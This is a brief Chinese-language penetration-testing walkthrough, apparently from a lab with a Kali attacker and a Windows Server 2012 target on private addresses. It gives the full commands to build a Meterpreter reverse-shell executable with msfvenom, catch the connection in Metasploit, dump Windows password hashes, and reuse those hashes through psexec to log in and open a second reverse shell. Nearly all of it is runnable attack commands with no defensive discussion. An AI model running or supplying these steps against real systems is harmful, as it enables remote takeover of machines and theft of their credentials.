kali : 192.168.3.136
windows server 2012 : 192.168.3.129
1、生成一个exe远控
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.136 LPORT=12345 -f exe > /root/test.exe
2、反弹到kali
启动msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.136
set lport 12345
run
3、抓取windows密码
run post/windows/gather/hashdump
run post/windows/gather/smart_hashdump
4、使用hash进行登录
use exploit/windows/smb/psexec
设置ip,账号,hash
set rhosts 192.168.3.129
set SMBuser 用户名
set SMBPass hash
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.136
set lport 1111
反弹成功